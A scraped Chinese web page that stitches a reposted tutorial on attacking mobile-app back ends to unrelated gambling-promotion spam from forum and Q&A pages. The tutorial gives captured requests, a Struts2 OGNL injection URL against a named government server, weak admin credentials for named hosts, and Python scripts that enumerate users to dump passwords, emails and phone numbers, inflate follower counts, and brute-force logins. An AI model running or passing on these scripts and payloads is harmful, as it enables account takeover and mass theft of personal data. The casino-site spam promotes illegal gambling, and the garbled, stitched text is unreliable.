mg摆脱mg游戏摆脱爆免费技巧漏洞有手机app吗,想往更深层次的学习

&本文转自:http://www.dickeye.com/?id=16
&主要是手机APP漏洞 放在web端测试 学习了
智能手机的存在让网民的生活从PC端开始往移动端转向,现在网民的日常生活需求基本上一部手机就能解决。外卖,办公,社交,银行转账等等都能通过移动端App实现。那么随之也带来了很多信息安全问题,大量的用户信息储存在移动App中,由于移动App的开发并不健全,由移动App引发的用户信息泄露事件也层出不穷。
移动App中的Web型漏洞主要分为以下几块:
1.SQL注入漏洞
这是一个不能再常见的漏洞类型了,由于App的特性,开发人员认为使用App时无法获取到详细URL等信息,所以忽视了App防注入的编写。
糗事百科某处SQL注入可导致1500w用户信息泄露
http://loudong.360.cn/vul/info/qid/QTVA-
全峰快递注入漏洞,可直接建服务器用户,各种订单用户数据泄露
http://loudong.360.cn/vul/info/qid/QTVA-
永辉超市Appsql注入导致超市及用户信息泄露&
http://loudong.360.cn/vul/info/qid/QTVA-
社交App&小湿妹&某处洞洞,数据库沦陷
http://loudong.360.cn/vul/info/qid/QTVA-
提升逼格的App&交换&数据库沦陷,用户信息泄露
http://loudong.360.cn/vul/info/qid/QTVA-
这些漏洞都是由于App开发中忽视了接口可能存在SQL注入问题,其中也包括POST注入,GET注入,COOKIE注入等等。
拿糗事百科注入详细举例:
在查询用户详细信息时抓包,包内容如下:
&&&&GET&/user/6122886/detail?rqcnt=12&r=dec363d49&HTTP/1.1&&&&User-Agent:&qiushibalke_6.2.0_WIFI_auto_7&&&&Source:&android_6.2.0&&&&Model:&Xiaomi/cancro_wc_lte/cancro:4.4.4/KTU84P/V6.3.3.0.KXDCNBL:user/release-keys&&&&Qbtoken:&929efcfaf4dbb1ec404b&&&&Uuid:&IMEI_2af2c2beee1dbd00d3436cffdec363d7&&&&Deviceidinfo:&{"DEVICEID":"03","RANDOM":"","ANDROID_ID":"2eabdd57","SIMNO":"'","IMSI":"851","SERIAL":"5d999491","MAC":"0c:1d:af:db:07:9c","SDK_INT":19}&&&&Host:&nearby.qiushibaike.com&&&&Connection:&Keep-Alive&&&&Accept-Encoding:&gzip
其中Qbtoken参数存在注入
2.任意用户注册漏洞
此类漏洞并不危害到用户信息泄露,但是别有用心的黑客可能会利用此漏洞注册任意手机号码,并利用此注册账号去社工号码主人的朋友或者家人。
漏洞案例:
App&tataufo&某处漏洞可修改任意用户密码
http://loudong.360.cn/vul/info/qid/QTVA-
App&约饭&任意用户注册
http://loudong.360.cn/vul/info/qid/QTVA-
App&楼楼&任意用户注册
http://loudong.360.cn/vul/info/qid/QTVA-
任意用户注册漏洞中大部分是由于验证码机制不健全和注册过程验证不严谨,其中App&约饭&任意用户注册中
发送注册请求后直接返回了验证码值。
而App&楼楼&任意用户注册中,注册流程分为四个步骤
(1).注册用户,填写手机号,发送接收验证码请求。
(2).接收验证码,并填写。
(3).填写并验证验证码,进入填写资料步骤。
(4).填写用户资料,完成注册。
而这里在第四个步骤中出现了问题,前三步正常操作,在第四步时将资料中的号码改为任意手机号即能实现任意用户注册。
3.用户信息泄露
这种类型的漏洞多在用户资料查阅处存在,由于编写不严谨,在查询用户资料时会返回用户隐私信息,如账号邮箱,手机,密码等。
App&叽友&泄露用户信息
http://loudong.360.cn/vul/info/qid/QTVA-
Duang~App&小柚&用户信息泄露附验证脚本(密码,邮箱,手机号)
http://loudong.360.cn/vul/info/qid/QTVA-
糗事百科某处泄露用户信息
http://loudong.360.cn/vul/info/qid/QTVA-
拿App&小柚&举例
&&&&& 访问用户资料直接返回一些敏感信息,密码,邮箱,手机号
&&&&& 写个Python脚本来dump用户信息
&&&&import&os
&&&&import&json
&&&&import&random
&&&&import&requests
&&&&import&threadpool&as&tp
&&&&def&baopo():
&&&&&&&&&&&&flag&=&0
&&&&&&&&&&&&userid&=&0
&&&&&&&&&&&&while&True:
&&&&&&&&&&&&&&&&&&&&flag&+=&1
&&&&&&&&&&&&&&&&&&&&userid&+=&1
&&&&&&&&&&&&&&&&&&&&data&=&{'userid'&:&userid,}
&&&&&&&&&&&&&&&&&&&&api_url&=&''
&&&&&&&&&&&&&&&&&&&&my_string&=&"userid"
&&&&&&&&&&&&&&&&&&&&try:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&'[%s]&Test&Userid:&%s'&%&(flag,&userid)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req&=&requests.post(api_url,&data=data,&timeout=5)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_id&=&json.loads(req.content)['userid']
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_mail&=&json.loads(req.content)['email']
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_mobile&=&json.loads(req.content)['mobile']
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_qq&=&json.loads(req.content)['QQ']
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_pass&=&json.loads(req.content)['password']
&&&&&&&&&&&&&&&&&&&&except:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_status&=&0
&&&&&&&&&&&&&&&&&&&&if&my_string&in&req.json():
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f&=&open('./success_user1.txt',&'a+')
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f.write('%s--%s--%s--%s--%s\n'%(req_id,req_qq,req_mobile,req_mail,req_pass))
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f.close()
&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&if&__name__&==&'__main__':
&&&&&&&&&&&&baopo()
&&&&&&&&&&&&pool&=&tp.ThreadPool(100)
&&&&&&&&&&&&reqs&=&tp.makeRequests(baopo)
&&&&&&&&&&&&[pool.putRequest(req)&for&req&in&reqs]
&&&&&&&&&&&&pool.wait()
&&&&&&&&结果如下
&&&&&&&&4.框架问题(st2等)
&&&&&&&&这个并不多但也不容忽视
&&&&&&&&国家统计局手机网站新闻管理系统两处漏洞
&&&&&&&&http://loudong.360.cn/vul/info/qid/QTVA-
&&&&&&&&App&将爱&某漏洞可致服务器沦陷,泄露用户信息
&&&&&&&&http://loudong.360.cn/vul/info/qid/QTVA-
&&&&&&&&国家统计局手机新闻管理系统漏洞如下:
http://219.235.129.108:8080/NewManager/admin/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
5.后台弱口令
由于App站点URL信息并不是很明显,所以管理在设置后台路径和密码方面也显得比较随意
北京市地铁站新闻后台管理系统沦陷
http://loudong.360.cn/vul/info/qid/QTVA-
&&&&&&&&抓包得到
&&&&&&&&http://119.254.65.181/SubwayManagement/webservice/SubwayService
&&&&&&&&往上跨目录得到
&&&&&&&&http://119.254.65.181/SubwayManagement/和http://119.254.65.181/
&&&&&&&&两个后台系统,前者存在弱口令admin&admin&&和&&admin&beijingditieAppadmin
6.越权漏洞
这个漏洞出现率仅次于SQL注入
App&逗萌&某处设计不当(附验证脚本)
http://loudong.360.cn/vul/info/qid/QTVA-
社交App&足记&漏洞打包
http://loudong.360.cn/vul/info/qid/QTVA-
App&tataufo&某处漏洞可修改任意用户密码
http://loudong.360.cn/vul/info/qid/QTVA-
拿App&逗萌&某处设计不当为例
在App中对用户添加关注处没有任何验证
&&&&POST&/HC_AppClient/client-method/followUser.json&HTTP/1.1&&&&Content-Length:&39&&&&Content-Type:&Application/x-www-form-urlencoded&&&&Host:&115.29.5.49:80&&&&Connection:&Keep-Alive&&&&User-Agent:&Apache-HttpClient/UNAVAILABLE&(java&1.4)&&&&&fromUserId=&toUserId=
写了个脚本开始刷粉丝
&&&&import&os
&&&&import&json
&&&&import&random
&&&&import&requests
&&&&import&threadpool&as&tp
&&&&def&baopo():
&&&&&&&&&&&&flag&=&1
&&&&&&&&&&&&fromUserId&=&
&&&&&&&&&&&&while&True:
&&&&&&&&&&&&&&&&&&&&flag&+=&1
&&&&&&&&&&&&&&&&&&&&fromUserId&+=&1
&&&&&&&&&&&&&&&&&&&&data&=&{'fromUserId'&:&fromUserId,
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'toUserId'&:&'',}
&&&&&&&&&&&&&&&&&&&&api_url&=&''
&&&&&&&&&&&&&&&&&&&&my_string&=&"body"
&&&&&&&&&&&&&&&&&&&&try:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&'[%s]&Test&Userid:&%s'&%&(flag,&fromUserId)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req&=&requests.post(api_url,&data=data,&timeout=5)
&&&&&&&&&&&&&&&&&&&&except:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_status&=&0
&&&&&&&&&&&&&&&&&&&&if&my_string&in&req.json():
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f&=&open('./success_user1.txt',&'a+')
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f.write('%s\n'%(fromUserId))
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f.close()
&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&if&__name__&==&'__main__':
&&&&&&&&&&&&baopo()
&&&&&&&&&&&&pool&=&tp.ThreadPool(100)
&&&&&&&&&&&&reqs&=&tp.makeRequests(baopo)
&&&&&&&&&&&&[pool.putRequest(req)&for&req&in&reqs]
&&&&&&&&&&&&pool.wait()
7.接口未限制导致撞库
其实这个我也是看到蘑菇牛发的没拍漏洞才开始注意此类型漏洞的,运气还算不错,两三天就找到个同类型的、
App&疯拍&两处漏洞打包,附验证脚本
http://loudong.360.cn/vul/info/qid/QTVA-
疯拍存在两处漏洞,此处只举例接口未限制导致撞库
我用一个未注册手机号登陆返回提示
&&&&{"success":false,"error":"\u8be5\u53f7\ua\u672a\u6ce8\u518c\uff0c\u8bf7\u\u518c"}
&&&&{"success":false,"error":"该号码尚未注册,请先注册"}
提示尚未注册,用注册的用户登陆。
若密码错误,则会提示
&&&&{"success":false,"error":"\u5bc6\u\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3"}
&&&&{"success":false,"error":"密码错误,再仔细想想"}
&&&&若密码正确
&&&&{"success":true,"data":{"data":{"ucookie":"f8a940b8dc5a0b145e1e40fc3d48d9","username":"","avatar":"","level":0,"score":0,"setting":"{}","uid":16942,"nickname":"","t":},"expire":false}}
此处内容包含cookie,等相关信息。那么我们在蘑菇的脚本上稍微加一些改动即可实现爆破。
脚本如下,加了注释
&&&&import&json
&&&&import&random
&&&&import&requests
&&&&import&threadpool&as&tp
&&&&def&_burp(mobile):&
&&&&&&&&&&&&for&password&in&['qwertyu','123456',&'',&'000000',&mobile,'1234567','','']:&
&&&&&&&&&&&&&&&&&&&&api_url&=&''&&&
&&&&&&&&&&&&&&&&&&&&data&=&{'mobile':&mobile,
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'did':'c71c53fa20c38d4a14ae8245bac9bb99',
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'password':&password,}&&&
&&&&&&&&&&&&&&&&&&&&try:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&'[*]&Burp&mobile:&%s'&%&mobile
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req&=&requests.post(api_url,&data=data,&timeout=5)&
&&&&&&&&&&&&&&&&&&&&except:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&continue
&&&&&&&&&&&&&&&&&&&&try:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success&=&json.loads(req.content)['data']
&&&&&&&&&&&&&&&&&&&&&&&&&&&&burp_success&=&open('./fengpai_account.txt',&'a+')&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&burp_success.write('%s:::%s\n'%(mobile,&password))
&&&&&&&&&&&&&&&&&&&&&&&&&&&&burp_success.close()
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&success
&&&&&&&&&&&&&&&&&&&&&&&&&&&&return&success
&&&&&&&&&&&&&&&&&&&&except:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success&=&0
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&'[-]&Burp&False'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&continue
&&&&def&_status(args):&
&&&&&&&&&&&&flag&=&0
&&&&&&&&&&&&list&=&""&
&&&&&&&&&&&&sa&=&[]
&&&&&&&&&&&&for&i&in&range(8):&
&&&&&&&&&&&&&&&&&&&&sa.Append(random.choice(list))
&&&&&&&&&&&&while&True:
&&&&&&&&&&&&&&&&&&&&flag&+=&1
&&&&&&&&&&&&&&&&&&&&account_test&=&random.choice(['138','130','133','135','138','139','150','152','155','159','180','181','182','185','187','189'])\&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&+''.join(sa)
&&&&&&&&&&&&&&&&&&&&data&=&{'mobile':&account_test,
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'did':'c71c53fa20c38d4a14ae8245bac9bb99',
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'password':&'jhjhksd'}
&&&&&&&&&&&&&&&&&&&&api_url&=&''
&&&&&&&&&&&&&&&&&&&&try:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&'[%s]&Test&account:&%s'&%&(flag,&account_test)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req&=&requests.post(api_url,&data=data,&timeout=3)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_status&=&json.loads(req.content)['error']&
&&&&&&&&&&&&&&&&&&&&except:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&req_status&=&0
&&&&&&&&&&&&&&&&&&&&if&req_status&==&u'\u5bc6\u\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3':&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f&=&open('./fp_phone.txt',&'a+')
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f.write('%s\n'%account_test)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&success_f.close()
&&&&&&&&&&&&&&&&&&&&&&&&&&&&_burp(account_test)
&&&&&&&&&&&&&&&&&&&&&&&&&&&&print&'\n[OK]&account:&%s\n'&%&account_test
&&&&if&__name__&==&'__main__':
&&&&&&&&&&&&args&=&[]
&&&&&&&&&&&&for&i&in&range(30):
&&&&&&&&&&&&&&&&&&&&args.Append(args)&
&&&&&&&&&&&&pool&=&tp.ThreadPool(30)
&&&&&&&&&&&&reqs&=&tp.makeRequests(_status,&args)
&&&&&&&&&&&&[pool.putRequest(req)&for&req&in&reqs]
&&&&&&&&&&&&pool.wait()
改了下蘑菇牛的随机数生成方式。
&&&&&& 因为该App并没有像美拍那样拥有很多用户所以爆破起来有点难,所以我在测试的时候把,测试范围函数里的list改为了
&&&list&=&"8"
&&&&&& 手机前三位改为了
&&&&account_test&=&random.choice(['138'])\&#&手机号前几位
&&&&这样只会生成(这个号码提交之前测试时候注册过)
&&&&&&&&进行爆破结果如下
阅读(...) 评论()mg摆脱吧-百度贴吧
签到排名:今日本吧第个签到,
本吧因你更精彩,明天继续来努力!
本吧排名:
本吧签到人数:3
可签7级以上的吧50个
本月漏签0次!
成为超级会员,赠送8张补签卡
连续签到:天&&累计签到:天
超级会员单次开通12个月以上,赠送连续签到卡3张
mg电子游戏网址多少
本人经历了前几次的惨痛失败教训,故给自己和大家一个明确的方向
最近在tt6802-com. 这里玩,都在放水。mg不朽浪漫原本就是讲《不朽的爱情》是一款西方魔幻主题的电子游戏
mg摆脱不朽浪漫电子游戏你们都是在哪玩容易触发滴血呢
谁有呢?要信誉好的
mg摆脱爆分网站多少?
糖果派对爆分无限循环freegame《tt1170·com》 糖果派对是一款类似于开心消消乐的爆分游戏,玩家要做的就是
谁知道,有放水和信誉好的台子吗?...
不一样的冰球突破,要玩找我
我玩过几个平台了,都感觉不是很好,大神们你们一般都是在那个平台玩的啊,你们认你们那个台子咋样
《TT6802-COM 》刚开始玩mg不朽浪漫的要注意的几点: 第一是有耐心。有些玩mg不朽浪漫的时候总是没看见爆
摆脱游戏大奖攻略
各路神仙快乐来
mg摆脱和冰上曲棍球都是一样的《tt1170·c0m》爆分台子。mg电子游戏种类很多,有时候地方的叫法不一样而
pt电子、mg电子、、jdb电子、ag电子、BB电子等等都是电子游戏平台中的其中一种。这些平台由不同的公司及
高手在哪里呢
冰球突破有什么爆分网站吗?求各位大神分享
mg电子摆脱大家都知道tt1170,老玩家创记录的地方。
不朽的浪漫如何才能滴血转大奖?相信这个问题困惑了很多朋友因为很多朋友都在抱怨出现滴血也不出大
mg摆脱如何爆分和技巧
玩摆脱只有爆分,爆分什么都好说,没有爆分说再多也是假的
说实话。我是一个很喜欢玩mg电子的人。特别是摆脱冰上曲棍球。那时候基本每天都要玩,每天冲一千进去
最近台子不行了,水友们推荐几个台子我吃点肉
mg 摆 脱 这好玩的 游 戏,没有之一
mg摆脱冰球突破是有技巧的
有谁懂得的吗?
我在《tt1170---com》玩mg摆脱应该快有4年多了,今天给小伙伴聊聊如何掌握mg摆脱的爆分时间。说的不好不要
mg摆脱心态和时间很关键
mg摆脱网址分享
mg摆脱还有新玩法的吗
mg摆脱网址有分享的吗
这个游戏真的是坑,哪里有交流群坑货加我这个群
QQ群,一起交流
发贴红色标题
签到六倍经验
兑换本吧会员
赠送补签卡1张,获得
助攻总额: 43W
发表后自动分享本贴
使用签名档&&2018 Baidu
微信扫一扫精选音乐每日推送!
扫描下载APPmg摆脱游戏漏洞里面有哪些好顽的游戏_百度知道
mg摆脱游戏漏洞里面有哪些好顽的游戏
mg摆脱游戏漏洞里面有哪些好顽的游戏输=入-玩 9898du.p&shyw地毯修补流程答:地毯的优点很多,如弹性好、美观、吸音等等,虽然地毯最大的缺点就是
我有更好的答案
唧唧歪歪,
采纳率:100%
》》》》金沙国际赌场7755877.c-o-m》》》】】】但他们没能做好的部分还是让他们付出了代价。尽管他们已经派出多人进行围追堵截,但詹姆斯-哈登还是交出了44分8助攻,带领火箭以104-101战胜森林狼。即使森林狼能够在西部首轮客场再次将火箭的三分球压制到37投10中,他们也将继续面对上一场中困扰他们的问题。无论如何,他们必须要制定比赛计划,要在兼顾保护三分线的情况下阻止哈登。
1条折叠回答
为您推荐:
其他类似问题
您可能关注的内容
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。MG电子摆脱游戏怎么下注,要下APP吗_百度知道
MG电子摆脱游戏怎么下注,要下APP吗
我有更好的答案
쏘지 않을
1条折叠回答
为您推荐:
其他类似问题
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。}

我要回帖

更多关于 mg摆脱游戏漏洞 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信